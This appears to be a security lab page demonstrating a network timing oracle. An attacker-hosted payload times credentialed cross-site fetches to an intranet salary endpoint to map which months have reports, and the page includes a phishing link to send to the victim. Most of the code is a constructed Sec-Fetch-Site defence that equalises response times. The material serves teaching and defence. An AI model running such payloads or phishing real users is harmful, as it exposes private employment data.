Attack 3: Network Timing Oracle
The victim's salary endpoint takes ~400ms when a report exists and responds instantly (404) when it does not.
fetch() timing leaks the entire employment calendar without reading a single byte of response.
How it works
Payload running in Alice's browser at https://attacker.ssc-primesec.de:
for each (year, month):
    const t0 = performance.now()
    await fetch('https://intravault.ssc-primesec.de/reports/view?year=Y&month=M',
                { mode: 'no-cors', credentials: 'include' })
    const ms = performance.now() - t0   // opaque response, but timing IS readable
    if (ms > 150): REPORT EXISTS        // server took 400ms (report found)
    else:          NO REPORT            // server returned 401/404 instantly
Phishing link: send this to Alice
https://attacker.ssc-primesec.de/payload/3
Protected: all requests are fast (~15ms, 401), so the calendar stays dark.
Vulnerable: real timings (hit=400ms), so the employment calendar is mapped.
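One way to get the "Protected" outcome, as an added example that is not the lab's own code: reject the request on its Sec-Fetch-Site header before the slow report lookup runs, so hits and misses cost the same. The helper names and report data are constructed. It assumes ssc-primesec.de is the registrable domain, which makes the attacker's subdomain same-site with the target, so the policy has to be same-origin only.

```javascript
// Added example: constructed data and hypothetical helper names throughout.
const REPORTS = new Set(['2023-01', '2023-02', '2023-07']); // constructed sample months
const SLOW_MS = 400; // report found (figure from the page)
const FAST_MS = 15;  // immediate rejection (figure from the page)

// Resource isolation check on the Sec-Fetch-Site request header.
// Only 'same-origin' and 'none' (typed URL, bookmark) may reach the lookup.
// 'same-site' is rejected on purpose: a sibling subdomain is still same-site.
function isAllowed(headers) {
  const site = headers['sec-fetch-site'];
  if (site === undefined) return true; // assumption: legacy client without Fetch Metadata
  return site === 'same-origin' || site === 'none';
}

// Simulated handler: returns the status and the server time a caller would observe.
function handle(req, protectedMode) {
  if (!req.session) return { status: 401, ms: FAST_MS };
  if (protectedMode && !isAllowed(req.headers)) return { status: 401, ms: FAST_MS };
  const key = `${req.year}-${String(req.month).padStart(2, '0')}`;
  return REPORTS.has(key)
    ? { status: 200, ms: SLOW_MS }
    : { status: 404, ms: FAST_MS };
}

// Distinct timings over one year: more than one value means the calendar leaks.
function distinctTimings(year, headers, protectedMode) {
  const seen = new Set();
  for (let month = 1; month <= 12; month++) {
    seen.add(handle({ year, month, headers, session: 'alice' }, protectedMode).ms);
  }
  return [...seen].sort((a, b) => a - b);
}

const sibling = { 'sec-fetch-site': 'same-site' }; // request from a sibling subdomain
const own = { 'sec-fetch-site': 'same-origin' };   // the application's own pages
console.log('vulnerable:', distinctTimings(2023, sibling, false));
console.log('protected :', distinctTimings(2023, sibling, true));
console.log('own pages :', distinctTimings(2023, own, true));
```

Because the two hosts are same-site, SameSite cookie attributes alone do not stop the session cookie from being attached to this request.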
Live results: salary calendar
| Year | Jan | Feb | Mar | Apr | May | Jun | Jul | Aug | Sep | Oct | Nov | Dec |
|---|---|---|---|---|---|---|---|---|---|---|---|---|